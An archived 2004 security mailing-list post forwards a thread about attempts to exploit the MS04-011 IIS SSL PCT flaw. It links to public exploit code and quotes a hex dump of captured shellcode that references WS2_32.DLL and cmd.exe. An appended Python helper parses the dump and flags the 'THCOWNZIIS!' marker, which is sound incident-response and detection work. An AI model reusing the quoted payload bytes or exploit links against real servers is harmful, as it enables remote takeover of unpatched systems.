subject: (Fwd) Re: Heads up: Looks like MS04-011 exploit is being tried
posted: Wed, 28 Apr 2004 07:38:20 +0100


This is apparently a new crack against IIS5. Not that I run IIS.

Stuart

------- Forwarded message follows -------
Date sent: Tue, 27 Apr 2004 09:54:30 -0500 (CDT)
Subject: Re: Heads up: Looks like MS04-011 exploit is being tried against www.domain
From: [email protected]
To: "James Riden o" <[email protected]>
Copies to: [email protected]


This appears to be from the THC exploit for SSL PCT released last week.
http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html
Running strings against the binary and grep'ing for "THCOWNZIIS!"
indicated the match.

Also be aware that what appears to be PERL-based exploit code is now
readily available, too, for this vulnerability.
http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php

Our experience testing the original THC code indicated that vulnerable
systems could be compromised in a matter of seconds.

>
> Seen as long ago as 25/04/2004. Haven't seen it used against any other
> servers here, so it's obviously targeted in some way. Example packet
> capture:
>
> 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
> 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
> 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
> 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
> 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
> 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
> 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
> 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
> 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
> 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
> 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
> 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
> 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
> 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
> 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
> 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
> 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
> 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
> 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
> 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
> 140 : F0 6A FF FF 55 E4 .j..U.
>
> --
> James Riden / [email protected] / Systems Security Engineer
> GPG public key available at: http://www.massey.ac.nz/~jriden/
> This post does not necessarily represent the views of my employer.
>
>
> ---------------------------------------------------------------------------
> ----------------------------------------------------------------------------
>
>


---------------------------------------------------------------------------
----------------------------------------------------------------------------
------- End of forwarded message -------
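Added example, not part of the forwarded thread: a small Python helper that does on the quoted capture what the reply above did on the binary, namely parse the "OFF : HH HH ... ascii" dump back into bytes, pull out printable runs the way `strings` would, and check for the "THCOWNZIIS!" marker. The sample input is the first two lines of the capture quoted above (the rest of the dump is left out; two lines are enough to exercise the parser and hit the marker). Function names and the offset check are my own choices, not anything from the THC code or the original post.

```python
import re

# Sample input: the first two lines of the packet capture quoted in the
# forwarded post (remaining lines deliberately omitted).
SAMPLE_DUMP = """\
000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
"""

# Marker string the reply found with `strings | grep`.
THC_MARKER = b"THCOWNZIIS!"

# One dump line: hex offset, colon, up to 16 "HH " byte pairs, then an
# ASCII column that we ignore (it is only a rendering of the same bytes,
# and it is the part that mail tools tend to mangle).
_LINE_RE = re.compile(
    r"^\s*([0-9a-fA-F]+)\s*:\s*((?:[0-9a-fA-F]{2}(?:\s|$)){1,16})"
)


def parse_hexdump(text):
    """Rebuild the raw payload bytes from a hexdump in the quoted format.

    The offset column is checked against the byte count so far, so a line
    dropped or duplicated by quoting/wrapping raises instead of silently
    shifting every later byte.
    """
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a hexdump line: {line!r}")
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(
                f"line {lineno}: offset {offset:#x}, expected {len(out):#x}"
            )
        out += bytes.fromhex(m.group(2))
    return bytes(out)


def ascii_column(chunk):
    """Render bytes the way the dump's ASCII column does ('.' for non-printable)."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)


def extract_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_marker(data, marker=THC_MARKER):
    """Offset of the marker inside the payload, or -1 if it is absent."""
    return data.find(marker)


def scan_capture(text):
    """Summarise one captured payload: strings seen and whether the marker hit."""
    data = parse_hexdump(text)
    offset = find_marker(data)
    return {
        "length": len(data),
        "strings": extract_strings(data),
        "marker_offset": offset,
        "matched": offset >= 0,
    }


if __name__ == "__main__":
    result = scan_capture(SAMPLE_DUMP)
    print(f"payload bytes : {result['length']}")
    print(f"strings       : {result['strings']}")
    if result["matched"]:
        print(f"THC marker at offset {result['marker_offset']:#x}")
    else:
        print("THC marker not found")
```

Running it on the two sample lines reports a 32-byte payload, the single string "THCOWNZIIS!2^", and the marker at offset 0x13. The offset check matters more than it looks: a quoted dump that has lost a line through mail wrapping will otherwise decode to a plausible but wrong byte string, and a signature anchored on an offset (rather than a content match like the one above) would then miss.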

---
* Origin: [adminz] tech, security, support (192.168.0.2)

generated by msg2page 0.06 on Jul 21, 2006 at 19:04:15
